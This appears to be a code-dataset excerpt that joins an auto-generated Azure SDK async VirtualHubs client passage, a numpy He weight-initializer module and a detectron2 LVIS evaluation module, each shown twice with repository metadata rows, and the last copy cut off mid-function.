    _delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualHubs/{virtualHubName}'}
    async def begin_delete(
        self,
        resource_group_name: str,
        virtual_hub_name: str,
        **kwargs
    ) -> AsyncLROPoller[None]:
        """Deletes a VirtualHub.

        :param resource_group_name: The resource group name of the VirtualHub.
        :param virtual_hub_name: The name of the VirtualHub.
        :keyword callable cls: A custom type or function that will be passed the direct response.
        :keyword str continuation_token: A continuation token to restart a poller from a saved state.
        :keyword polling: True for ARMPolling, False for no polling, or a polling object.
        :keyword int polling_interval: Default wait between polls when no Retry-After header is present.
        :return: An AsyncLROPoller that returns either None or the result of cls(response).
        :raises ~azure.core.exceptions.HttpResponseError:
        """
        polling = kwargs.pop('polling', True)
        cls = kwargs.pop('cls', None)
        lro_delay = kwargs.pop(
            'polling_interval',
            self._config.polling_interval
        )
        cont_token = kwargs.pop('continuation_token', None)
        if cont_token is None:
            # No saved state: fire the initial DELETE. cls=lambda hands back the
            # raw pipeline response so the poller can drive the operation from it.
            raw_result = await self._delete_initial(
                resource_group_name=resource_group_name,
                virtual_hub_name=virtual_hub_name,
                cls=lambda x,y,z: x,
                **kwargs
            )
        # Request-only kwargs must not be forwarded to the polling method below.
        kwargs.pop('error_map', None)
        kwargs.pop('content_type', None)
        def get_long_running_output(pipeline_response):
            # Delete produces no body; only honor the caller's 'cls' callback.
            if cls:
                return cls(pipeline_response, None, {})
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'virtualHubName': self._serialize.url("virtual_hub_name", virtual_hub_name, 'str'),
        }
        if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
        elif polling is False: polling_method = AsyncNoPolling()
        else: polling_method = polling
        if cont_token:
            return AsyncLROPoller.from_continuation_token(
                polling_method=polling_method,
                continuation_token=cont_token,
                client=self._client,
                deserialization_callback=get_long_running_output
            )
        else:
            return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
    begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualHubs/{virtualHubName}'}
    def list_by_resource_group(
        self,
        resource_group_name: str,
        **kwargs
    ) -> AsyncIterable["_models.ListVirtualHubsResult"]:
        """Lists all the VirtualHubs in a resource group.

        :param resource_group_name: The resource group name of the VirtualHub.
        :keyword callable cls: A custom type or function that will be passed the direct response.
        :return: An AsyncItemPaged iterator of ListVirtualHubsResult pages.
        :raises ~azure.core.exceptions.HttpResponseError:
        """
        cls = kwargs.pop('cls', None)
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2020-06-01"
        accept = "application/json"
        def prepare_request(next_link=None):
            # Build the request for one page of results.
            header_parameters = {}
            header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
            if not next_link:
                # First page: build the URL from the operation's URL template.
                url = self.list_by_resource_group.metadata['url']
                path_format_arguments = {
                    'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
                    'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
                }
                url = self._client.format_url(url, **path_format_arguments)
                query_parameters = {}
                query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
                request = self._client.get(url, query_parameters, header_parameters)
            else:
                # Subsequent pages: follow the server-provided next_link verbatim.
                url = next_link
                query_parameters = {}
                request = self._client.get(url, query_parameters, header_parameters)
            return request
        async def extract_data(pipeline_response):
            # Deserialize one page; return (next_link, iterable of elements).
            deserialized = self._deserialize('ListVirtualHubsResult', pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)
            return deserialized.next_link or None, AsyncList(list_of_elem)
        async def get_next(next_link=None):
            request = prepare_request(next_link)
            pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
            response = pipeline_response.http_response
            if response.status_code not in [200]:
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                raise HttpResponseError(response=response, error_format=ARMErrorFormat)
            return pipeline_response
        return AsyncItemPaged(
            get_next, extract_data
        )
    list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualHubs'}
    def list(
        self,
        **kwargs
    ) -> AsyncIterable["_models.ListVirtualHubsResult"]:
        """Page through all VirtualHubs in the subscription.

        Issues GET requests against the URL template in ``list.metadata`` and
        follows the service-returned ``next_link`` until it is exhausted.

        :keyword cls: optional callable applied to each page's element list
            before it is yielded (deserialization override).
        :return: an ``AsyncItemPaged`` of ``ListVirtualHubsResult`` pages.
        :raises HttpResponseError: for any response whose status is not 200.
        """
        cls = kwargs.pop('cls', None)
        # Map well-known error status codes to specific exception types;
        # callers may extend/override via the 'error_map' keyword.
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2020-06-01"
        accept = "application/json"
        def prepare_request(next_link=None):
            # First page: build the URL from the metadata template.
            # Follow-up pages: the service-provided next_link is used verbatim
            # (it already carries its own query string).
            header_parameters = {}
            header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
            if not next_link:
                url = self.list.metadata['url']
                path_format_arguments = {
                    'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
                }
                url = self._client.format_url(url, **path_format_arguments)
                query_parameters = {}
                query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
                request = self._client.get(url, query_parameters, header_parameters)
            else:
                url = next_link
                query_parameters = {}
                request = self._client.get(url, query_parameters, header_parameters)
            return request
        async def extract_data(pipeline_response):
            # Deserialize one page; return (continuation token, async item iterator).
            deserialized = self._deserialize('ListVirtualHubsResult', pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)
            return deserialized.next_link or None, AsyncList(list_of_elem)
        async def get_next(next_link=None):
            # Fetch a single page; translate non-200 responses into exceptions.
            request = prepare_request(next_link)
            pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
            response = pipeline_response.http_response
            if response.status_code not in [200]:
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                raise HttpResponseError(response=response, error_format=ARMErrorFormat)
            return pipeline_response
        return AsyncItemPaged(
            get_next, extract_data
        )
    # URL template used by prepare_request for the first page.
    list.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/virtualHubs'}
    async def _get_effective_virtual_hub_routes_initial(
        self,
        resource_group_name: str,
        virtual_hub_name: str,
        effective_routes_parameters: Optional["_models.EffectiveRoutesParameters"] = None,
        **kwargs
    ) -> None:
        """Issue the initial POST of the get-effective-routes long-running
        operation (used by ``begin_get_effective_virtual_hub_routes``).

        :param resource_group_name: resource group containing the virtual hub.
        :param virtual_hub_name: name of the virtual hub.
        :param effective_routes_parameters: optional request body; the request
            is sent with a ``None`` body when omitted.
        :raises HttpResponseError: for any status code other than 200 or 202.
        """
        cls = kwargs.pop('cls', None)
        # Map well-known error status codes to exception types; callers may
        # extend/override via the 'error_map' keyword.
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2020-06-01"
        content_type = kwargs.pop("content_type", "application/json")
        accept = "application/json"
        # Construct the request URL from the metadata template.
        url = self._get_effective_virtual_hub_routes_initial.metadata['url']
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'virtualHubName': self._serialize.url("virtual_hub_name", virtual_hub_name, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)
        # Query and header parameters.
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
        header_parameters = {}
        header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
        # Serialize the optional body (None -> request sent without content).
        body_content_kwargs = {}
        if effective_routes_parameters is not None:
            body_content = self._serialize.body(effective_routes_parameters, 'EffectiveRoutesParameters')
        else:
            body_content = None
        body_content_kwargs['content'] = body_content
        request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        # The service answers 200 or 202 for this LRO initial call; anything
        # else is surfaced as an error.
        if response.status_code not in [200, 202]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)
        if cls:
            return cls(pipeline_response, None, {})
    _get_effective_virtual_hub_routes_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualHubs/{virtualHubName}/effectiveRoutes'}
    async def begin_get_effective_virtual_hub_routes(
        self,
        resource_group_name: str,
        virtual_hub_name: str,
        effective_routes_parameters: Optional["_models.EffectiveRoutesParameters"] = None,
        **kwargs
    ) -> AsyncLROPoller[None]:
        """Start the get-effective-virtual-hub-routes long-running operation
        and return a poller for it.

        :param resource_group_name: resource group containing the virtual hub.
        :param virtual_hub_name: name of the virtual hub.
        :param effective_routes_parameters: optional request body parameters.
        :keyword polling: True (default) for ARM polling, False for no polling,
            or a custom polling-method object.
        :keyword continuation_token: resume a previously started operation
            instead of issuing a new initial request.
        :return: an ``AsyncLROPoller`` whose result is ``None``.
        """
        polling = kwargs.pop('polling', True)
        cls = kwargs.pop('cls', None)
        lro_delay = kwargs.pop(
            'polling_interval',
            self._config.polling_interval
        )
        cont_token = kwargs.pop('continuation_token', None)
        if cont_token is None:
            # No continuation token: kick off the operation.
            # cls=lambda x,y,z: x keeps the raw pipeline response for the poller.
            raw_result = await self._get_effective_virtual_hub_routes_initial(
                resource_group_name=resource_group_name,
                virtual_hub_name=virtual_hub_name,
                effective_routes_parameters=effective_routes_parameters,
                cls=lambda x,y,z: x,
                **kwargs
            )
        # These kwargs were only meaningful for the initial request.
        kwargs.pop('error_map', None)
        kwargs.pop('content_type', None)
        def get_long_running_output(pipeline_response):
            # Final deserialization hook; the operation itself yields no body.
            if cls:
                return cls(pipeline_response, None, {})
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'virtualHubName': self._serialize.url("virtual_hub_name", virtual_hub_name, 'str'),
        }
        # 'final-state-via: location' -> the final state is read from the
        # Location header during ARM polling.
        if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
        elif polling is False: polling_method = AsyncNoPolling()
        else: polling_method = polling
        if cont_token:
            return AsyncLROPoller.from_continuation_token(
                polling_method=polling_method,
                continuation_token=cont_token,
                client=self._client,
                deserialization_callback=get_long_running_output
            )
        else:
            return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
    begin_get_effective_virtual_hub_routes.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualHubs/{virtualHubName}/effectiveRoutes'}
| true | true |
1c305ddb001f13daeb09fafa14c1e6e04627c7cf | 484 | py | Python | nnfs/initializers/he.py | akshaykurmi/neural-networks-from-scratch | 54d62d9f5adb102d14267a922a515fa79bf52bd6 | [
"MIT"
] | 2 | 2019-09-13T22:31:21.000Z | 2020-11-28T18:51:14.000Z | nnfs/initializers/he.py | akshaykurmi/neural-networks-from-scratch | 54d62d9f5adb102d14267a922a515fa79bf52bd6 | [
"MIT"
] | null | null | null | nnfs/initializers/he.py | akshaykurmi/neural-networks-from-scratch | 54d62d9f5adb102d14267a922a515fa79bf52bd6 | [
"MIT"
] | null | null | null | import numpy as np
class HeUniform:
    """He (Kaiming) uniform initializer: U(-limit, limit), limit = sqrt(6 / fan_in)."""

    @staticmethod
    def initialize(shape):
        """Return an array of the given shape drawn from the He uniform distribution.

        For a 2-D (dense) weight shape, fan_in is shape[0]; otherwise
        (conv-style weights) fan_in = shape[1] * product of the remaining dims.
        """
        if len(shape) == 2:
            fan_in = shape[0]
        else:
            fan_in = shape[1] * np.prod(shape[2:])
        limit = np.sqrt(6.0 / fan_in)
        return np.random.uniform(low=-limit, high=limit, size=shape)
class HeNormal:
    """He (Kaiming) normal initializer: N(0, sqrt(2 / fan_in))."""

    @staticmethod
    def initialize(shape):
        """Return an array of the given shape drawn from the He normal distribution.

        fan_in follows the same convention as HeUniform: shape[0] for dense
        (2-D) weights, shape[1] * product of remaining dims otherwise.
        """
        if len(shape) == 2:
            fan_in = shape[0]
        else:
            fan_in = shape[1] * np.prod(shape[2:])
        std = np.sqrt(2.0 / fan_in)
        return np.random.standard_normal(shape) * std
| 26.888889 | 79 | 0.609504 | import numpy as np
class HeUniform:
    """He (Kaiming) uniform initializer: U(-scale, scale), scale = sqrt(6 / fan_in)."""
    @staticmethod
    def initialize(shape):
        """Return an array of the given shape drawn from the He uniform distribution.

        fan_in is shape[0] for dense (2-D) weights, otherwise
        shape[1] * product of the remaining dims (conv-style weights).
        """
        fan_in = shape[0] if len(shape) == 2 else shape[1] * np.prod(shape[2:])
        scale = np.sqrt(6.0 / fan_in)
        return np.random.uniform(-scale, scale, shape)
class HeNormal:
    """He (Kaiming) normal initializer: N(0, sqrt(2 / fan_in))."""
    @staticmethod
    def initialize(shape):
        """Return an array of the given shape drawn from the He normal distribution.

        fan_in is shape[0] for dense (2-D) weights, otherwise
        shape[1] * product of the remaining dims (conv-style weights).
        """
        fan_in = shape[0] if len(shape) == 2 else shape[1] * np.prod(shape[2:])
        scale = np.sqrt(2.0 / fan_in)
        return np.random.randn(*shape) * scale
| true | true |
1c305e22ccc0b03111e13cb76675f569b49a53b8 | 13,509 | py | Python | detectron2_repo/evaluation/lvis_evaluation.py | JaninaMattes/detectron2_dla | da9b0925eb280a208e7837986f7cf79779d3ca61 | [
"Apache-2.0"
] | null | null | null | detectron2_repo/evaluation/lvis_evaluation.py | JaninaMattes/detectron2_dla | da9b0925eb280a208e7837986f7cf79779d3ca61 | [
"Apache-2.0"
] | null | null | null | detectron2_repo/evaluation/lvis_evaluation.py | JaninaMattes/detectron2_dla | da9b0925eb280a208e7837986f7cf79779d3ca61 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
import copy
import itertools
import json
import logging
import os
import pickle
from collections import OrderedDict
import torch
from fvcore.common.file_io import PathManager
import detectron2.utils.comm as comm
from detectron2.data import MetadataCatalog
from detectron2.structures import Boxes, BoxMode, pairwise_iou
from detectron2.utils.logger import create_small_table
from .coco_evaluation import instances_to_coco_json
from .evaluator import DatasetEvaluator
class LVISEvaluator(DatasetEvaluator):
    """
    Evaluate object proposal and instance detection/segmentation outputs using
    LVIS's metrics and evaluation API.
    """
    def __init__(self, dataset_name, cfg, distributed, output_dir=None):
        """
        Args:
            dataset_name (str): name of the dataset to be evaluated.
                It must have the following corresponding metadata:
                "json_file": the path to the LVIS format annotation
            cfg (CfgNode): config instance
            distributed (True): if True, will collect results from all ranks for evaluation.
                Otherwise, will evaluate the results in the current process.
            output_dir (str): optional, an output directory to dump results.
        """
        from lvis import LVIS
        self._tasks = self._tasks_from_config(cfg)
        self._distributed = distributed
        self._output_dir = output_dir
        self._cpu_device = torch.device("cpu")
        self._logger = logging.getLogger(__name__)
        self._metadata = MetadataCatalog.get(dataset_name)
        json_file = PathManager.get_local_path(self._metadata.json_file)
        self._lvis_api = LVIS(json_file)
        # Test set json files do not contain annotations (evaluation must be
        # performed using the LVIS evaluation server).
        self._do_evaluation = len(self._lvis_api.get_ann_ids()) > 0
    def reset(self):
        # Per-run accumulators; `process` appends to `_predictions`.
        self._predictions = []
        self._lvis_results = []
    def _tasks_from_config(self, cfg):
        """
        Returns:
            tuple[str]: tasks that can be evaluated under the given configuration.
        """
        tasks = ("bbox",)
        if cfg.MODEL.MASK_ON:
            tasks = tasks + ("segm",)
        return tasks
    def process(self, inputs, outputs):
        """
        Args:
            inputs: the inputs to a LVIS model (e.g., GeneralizedRCNN).
                It is a list of dict. Each dict corresponds to an image and
                contains keys like "height", "width", "file_name", "image_id".
            outputs: the outputs of a LVIS model. It is a list of dicts with key
                "instances" that contains :class:`Instances`.
        """
        for input, output in zip(inputs, outputs):
            prediction = {"image_id": input["image_id"]}
            # Move outputs to CPU before storing so GPU memory is released.
            if "instances" in output:
                instances = output["instances"].to(self._cpu_device)
                prediction["instances"] = instances_to_coco_json(instances, input["image_id"])
            if "proposals" in output:
                prediction["proposals"] = output["proposals"].to(self._cpu_device)
            self._predictions.append(prediction)
    def evaluate(self):
        # In distributed mode, gather all ranks' predictions on rank 0;
        # non-main processes return None after gathering.
        if self._distributed:
            comm.synchronize()
            self._predictions = comm.gather(self._predictions, dst=0)
            self._predictions = list(itertools.chain(*self._predictions))
            if not comm.is_main_process():
                return
        if len(self._predictions) == 0:
            self._logger.warning("[LVISEvaluator] Did not receive valid predictions.")
            return {}
        if self._output_dir:
            PathManager.mkdirs(self._output_dir)
            file_path = os.path.join(self._output_dir, "instances_predictions.pth")
            with PathManager.open(file_path, "wb") as f:
                torch.save(self._predictions, f)
        self._results = OrderedDict()
        if "proposals" in self._predictions[0]:
            self._eval_box_proposals()
        if "instances" in self._predictions[0]:
            self._eval_predictions(set(self._tasks))
        # Copy so the caller can do whatever with results
        return copy.deepcopy(self._results)
    def _eval_predictions(self, tasks):
        """
        Evaluate self._predictions on the given tasks.
        Fill self._results with the metrics of the tasks.
        """
        self._logger.info("Preparing results in the LVIS format ...")
        self._lvis_results = list(itertools.chain(*[x["instances"] for x in self._predictions]))
        # unmap the category ids for LVIS (from 0-indexed to 1-indexed)
        for result in self._lvis_results:
            result["category_id"] += 1
        if self._output_dir:
            file_path = os.path.join(self._output_dir, "lvis_instances_results.json")
            self._logger.info("Saving results to {}".format(file_path))
            with PathManager.open(file_path, "w") as f:
                f.write(json.dumps(self._lvis_results))
                f.flush()
        if not self._do_evaluation:
            self._logger.info("Annotations are not available for evaluation.")
            return
        self._logger.info("Evaluating predictions ...")
        for task in sorted(tasks):
            res = _evaluate_predictions_on_lvis(
                self._lvis_api,
                self._lvis_results,
                task,
                class_names=self._metadata.get("thing_classes"),
            )
            self._results[task] = res
    def _eval_box_proposals(self):
        """
        Evaluate the box proposals in self._predictions.
        Fill self._results with the metrics for "box_proposals" task.
        """
        if self._output_dir:
            # Saving generated box proposals to file.
            # Predicted box_proposals are in XYXY_ABS mode.
            bbox_mode = BoxMode.XYXY_ABS.value
            ids, boxes, objectness_logits = [], [], []
            for prediction in self._predictions:
                ids.append(prediction["image_id"])
                boxes.append(prediction["proposals"].proposal_boxes.tensor.numpy())
                objectness_logits.append(prediction["proposals"].objectness_logits.numpy())
            proposal_data = {
                "boxes": boxes,
                "objectness_logits": objectness_logits,
                "ids": ids,
                "bbox_mode": bbox_mode,
            }
            with PathManager.open(os.path.join(self._output_dir, "box_proposals.pkl"), "wb") as f:
                pickle.dump(proposal_data, f)
        if not self._do_evaluation:
            self._logger.info("Annotations are not available for evaluation.")
            return
        self._logger.info("Evaluating bbox proposals ...")
        res = {}
        # Average recall at 100/1000 proposals, per gt-box area bucket.
        areas = {"all": "", "small": "s", "medium": "m", "large": "l"}
        for limit in [100, 1000]:
            for area, suffix in areas.items():
                stats = _evaluate_box_proposals(
                    self._predictions, self._lvis_api, area=area, limit=limit
                )
                key = "AR{}@{:d}".format(suffix, limit)
                res[key] = float(stats["ar"].item() * 100)
        self._logger.info("Proposal metrics: \n" + create_small_table(res))
        self._results["box_proposals"] = res
# inspired from Detectron:
# https://github.com/facebookresearch/Detectron/blob/a6a835f5b8208c45d0dce217ce9bbda915f44df7/detectron/datasets/json_dataset_evaluator.py#L255 # noqa
def _evaluate_box_proposals(dataset_predictions, lvis_api, thresholds=None, area="all", limit=None):
    """
    Evaluate detection proposal recall metrics. This function is a much
    faster alternative to the official LVIS API recall evaluation code. However,
    it produces slightly different results.

    Args:
        dataset_predictions (list[dict]): each dict holds "image_id" and
            "proposals" (with `proposal_boxes` and `objectness_logits`).
        lvis_api: LVIS API object used to look up ground-truth annotations.
        thresholds: IoU thresholds tensor; defaults to 0.5:0.95 in 0.05 steps.
        area (str): key of `areas` below, selecting a gt-box area bucket.
        limit (int or None): if set, keep only the top-`limit` scoring
            proposals per image.

    Returns:
        dict: "ar" (mean recall over thresholds), "recalls", "thresholds",
        "gt_overlaps" (sorted best-IoU per counted gt box), "num_pos".
    """
    # Record max overlap value for each gt box
    # Return vector of overlap values
    areas = {
        "all": 0,
        "small": 1,
        "medium": 2,
        "large": 3,
        "96-128": 4,
        "128-256": 5,
        "256-512": 6,
        "512-inf": 7,
    }
    area_ranges = [
        [0 ** 2, 1e5 ** 2],  # all
        [0 ** 2, 32 ** 2],  # small
        [32 ** 2, 96 ** 2],  # medium
        [96 ** 2, 1e5 ** 2],  # large
        [96 ** 2, 128 ** 2],  # 96-128
        [128 ** 2, 256 ** 2],  # 128-256
        [256 ** 2, 512 ** 2],  # 256-512
        [512 ** 2, 1e5 ** 2],
    ]  # 512-inf
    assert area in areas, "Unknown area range: {}".format(area)
    area_range = area_ranges[areas[area]]
    gt_overlaps = []
    num_pos = 0
    for prediction_dict in dataset_predictions:
        predictions = prediction_dict["proposals"]
        # sort predictions in descending order
        # TODO maybe remove this and make it explicit in the documentation
        inds = predictions.objectness_logits.sort(descending=True)[1]
        predictions = predictions[inds]
        ann_ids = lvis_api.get_ann_ids(img_ids=[prediction_dict["image_id"]])
        anno = lvis_api.load_anns(ann_ids)
        # LVIS boxes are XYWH; convert to XYXY for IoU computation.
        gt_boxes = [
            BoxMode.convert(obj["bbox"], BoxMode.XYWH_ABS, BoxMode.XYXY_ABS) for obj in anno
        ]
        gt_boxes = torch.as_tensor(gt_boxes).reshape(-1, 4)  # guard against no boxes
        gt_boxes = Boxes(gt_boxes)
        gt_areas = torch.as_tensor([obj["area"] for obj in anno])
        if len(gt_boxes) == 0 or len(predictions) == 0:
            continue
        # Keep only gt boxes inside the requested area bucket.
        valid_gt_inds = (gt_areas >= area_range[0]) & (gt_areas <= area_range[1])
        gt_boxes = gt_boxes[valid_gt_inds]
        num_pos += len(gt_boxes)
        if len(gt_boxes) == 0:
            continue
        if limit is not None and len(predictions) > limit:
            predictions = predictions[:limit]
        overlaps = pairwise_iou(predictions.proposal_boxes, gt_boxes)
        _gt_overlaps = torch.zeros(len(gt_boxes))
        # Greedy one-to-one matching: repeatedly take the (proposal, gt) pair
        # with the highest remaining IoU, then retire both.
        for j in range(min(len(predictions), len(gt_boxes))):
            # find which proposal box maximally covers each gt box
            # and get the iou amount of coverage for each gt box
            max_overlaps, argmax_overlaps = overlaps.max(dim=0)
            # find which gt box is 'best' covered (i.e. 'best' = most iou)
            gt_ovr, gt_ind = max_overlaps.max(dim=0)
            assert gt_ovr >= 0
            # find the proposal box that covers the best covered gt box
            box_ind = argmax_overlaps[gt_ind]
            # record the iou coverage of this gt box
            _gt_overlaps[j] = overlaps[box_ind, gt_ind]
            assert _gt_overlaps[j] == gt_ovr
            # mark the proposal box and the gt box as used
            overlaps[box_ind, :] = -1
            overlaps[:, gt_ind] = -1
        # append recorded iou coverage level
        gt_overlaps.append(_gt_overlaps)
    gt_overlaps = torch.cat(gt_overlaps, dim=0)
    gt_overlaps, _ = torch.sort(gt_overlaps)
    if thresholds is None:
        step = 0.05
        thresholds = torch.arange(0.5, 0.95 + 1e-5, step, dtype=torch.float32)
    recalls = torch.zeros_like(thresholds)
    # compute recall for each iou threshold
    for i, t in enumerate(thresholds):
        recalls[i] = (gt_overlaps >= t).float().sum() / float(num_pos)
    # ar = 2 * np.trapz(recalls, thresholds)
    ar = recalls.mean()
    return {
        "ar": ar,
        "recalls": recalls,
        "thresholds": thresholds,
        "gt_overlaps": gt_overlaps,
        "num_pos": num_pos,
    }
def _evaluate_predictions_on_lvis(lvis_gt, lvis_results, iou_type, class_names=None):
"""
Args:
iou_type (str):
kpt_oks_sigmas (list[float]):
class_names (None or list[str]): if provided, will use it to predict
per-category AP.
Returns:
a dict of {metric name: score}
"""
metrics = {
"bbox": ["AP", "AP50", "AP75", "APs", "APm", "APl", "APr", "APc", "APf"],
"segm": ["AP", "AP50", "AP75", "APs", "APm", "APl", "APr", "APc", "APf"],
}[iou_type]
logger = logging.getLogger(__name__)
if len(lvis_results) == 0: # TODO: check if needed
logger.warn("No predictions from the model! Set scores to -1")
return {metric: -1 for metric in metrics}
if iou_type == "segm":
lvis_results = copy.deepcopy(lvis_results)
# When evaluating mask AP, if the results contain bbox, LVIS API will
# use the box area as the area of the instance, instead of the mask area.
# This leads to a different definition of small/medium/large.
# We remove the bbox field to let mask AP use mask area.
for c in lvis_results:
c.pop("bbox", None)
from lvis import LVISEval, LVISResults
lvis_results = LVISResults(lvis_gt, lvis_results)
lvis_eval = LVISEval(lvis_gt, lvis_results, iou_type)
lvis_eval.run()
lvis_eval.print_results()
# Pull the standard metrics from the LVIS results
results = lvis_eval.get_results()
results = {metric: float(results[metric] * 100) for metric in metrics}
logger.info("Evaluation results for {}: \n".format(iou_type) + create_small_table(results))
return results
| 39.615836 | 151 | 0.596343 |
import copy
import itertools
import json
import logging
import os
import pickle
from collections import OrderedDict
import torch
from fvcore.common.file_io import PathManager
import detectron2.utils.comm as comm
from detectron2.data import MetadataCatalog
from detectron2.structures import Boxes, BoxMode, pairwise_iou
from detectron2.utils.logger import create_small_table
from .coco_evaluation import instances_to_coco_json
from .evaluator import DatasetEvaluator
class LVISEvaluator(DatasetEvaluator):
    """Evaluate object proposal and instance detection/segmentation outputs
    using LVIS's metrics and evaluation API."""
    def __init__(self, dataset_name, cfg, distributed, output_dir=None):
        """
        Args:
            dataset_name (str): dataset name; its metadata must provide
                "json_file", the path to the LVIS-format annotation file.
            cfg (CfgNode): config instance.
            distributed (bool): if True, gather results from all ranks before
                evaluating; otherwise evaluate only the current process.
            output_dir (str): optional directory to dump result files into.
        """
        from lvis import LVIS
        self._tasks = self._tasks_from_config(cfg)
        self._distributed = distributed
        self._output_dir = output_dir
        self._cpu_device = torch.device("cpu")
        self._logger = logging.getLogger(__name__)
        self._metadata = MetadataCatalog.get(dataset_name)
        json_file = PathManager.get_local_path(self._metadata.json_file)
        self._lvis_api = LVIS(json_file)
        # Test-set jsons contain no annotations; local evaluation is then
        # disabled (the LVIS evaluation server must be used instead).
        self._do_evaluation = len(self._lvis_api.get_ann_ids()) > 0
    def reset(self):
        """Clear the per-run accumulators filled by `process`."""
        self._predictions = []
        self._lvis_results = []
    def _tasks_from_config(self, cfg):
        """Return the tuple of tasks to evaluate: ("bbox",) plus "segm" when
        cfg.MODEL.MASK_ON is set."""
        tasks = ("bbox",)
        if cfg.MODEL.MASK_ON:
            tasks = tasks + ("segm",)
        return tasks
    def process(self, inputs, outputs):
        """Convert one batch of model inputs/outputs into prediction dicts
        ("image_id" plus "instances" as COCO-json records and/or "proposals"
        moved to CPU) and append them to self._predictions."""
        for input, output in zip(inputs, outputs):
            prediction = {"image_id": input["image_id"]}
            if "instances" in output:
                instances = output["instances"].to(self._cpu_device)
                prediction["instances"] = instances_to_coco_json(instances, input["image_id"])
            if "proposals" in output:
                prediction["proposals"] = output["proposals"].to(self._cpu_device)
            self._predictions.append(prediction)
    def evaluate(self):
        """Gather predictions across ranks (if distributed), optionally dump
        them, then run proposal and/or instance evaluation.

        Returns a results dict on the main process; None on worker ranks."""
        if self._distributed:
            comm.synchronize()
            self._predictions = comm.gather(self._predictions, dst=0)
            self._predictions = list(itertools.chain(*self._predictions))
            if not comm.is_main_process():
                return
        if len(self._predictions) == 0:
            self._logger.warning("[LVISEvaluator] Did not receive valid predictions.")
            return {}
        if self._output_dir:
            PathManager.mkdirs(self._output_dir)
            file_path = os.path.join(self._output_dir, "instances_predictions.pth")
            with PathManager.open(file_path, "wb") as f:
                torch.save(self._predictions, f)
        self._results = OrderedDict()
        if "proposals" in self._predictions[0]:
            self._eval_box_proposals()
        if "instances" in self._predictions[0]:
            self._eval_predictions(set(self._tasks))
        # Deep-copy so the caller may freely mutate the returned dict.
        return copy.deepcopy(self._results)
    def _eval_predictions(self, tasks):
        """Evaluate self._predictions on `tasks` and fill self._results."""
        self._logger.info("Preparing results in the LVIS format ...")
        self._lvis_results = list(itertools.chain(*[x["instances"] for x in self._predictions]))
        # Unmap category ids for LVIS (from 0-indexed to 1-indexed).
        for result in self._lvis_results:
            result["category_id"] += 1
        if self._output_dir:
            file_path = os.path.join(self._output_dir, "lvis_instances_results.json")
            self._logger.info("Saving results to {}".format(file_path))
            with PathManager.open(file_path, "w") as f:
                f.write(json.dumps(self._lvis_results))
                f.flush()
        if not self._do_evaluation:
            self._logger.info("Annotations are not available for evaluation.")
            return
        self._logger.info("Evaluating predictions ...")
        for task in sorted(tasks):
            res = _evaluate_predictions_on_lvis(
                self._lvis_api,
                self._lvis_results,
                task,
                class_names=self._metadata.get("thing_classes"),
            )
            self._results[task] = res
    def _eval_box_proposals(self):
        """Evaluate box proposals in self._predictions and fill
        self._results["box_proposals"] with AR metrics."""
        if self._output_dir:
            # Saved proposals are in XYXY_ABS box mode.
            bbox_mode = BoxMode.XYXY_ABS.value
            ids, boxes, objectness_logits = [], [], []
            for prediction in self._predictions:
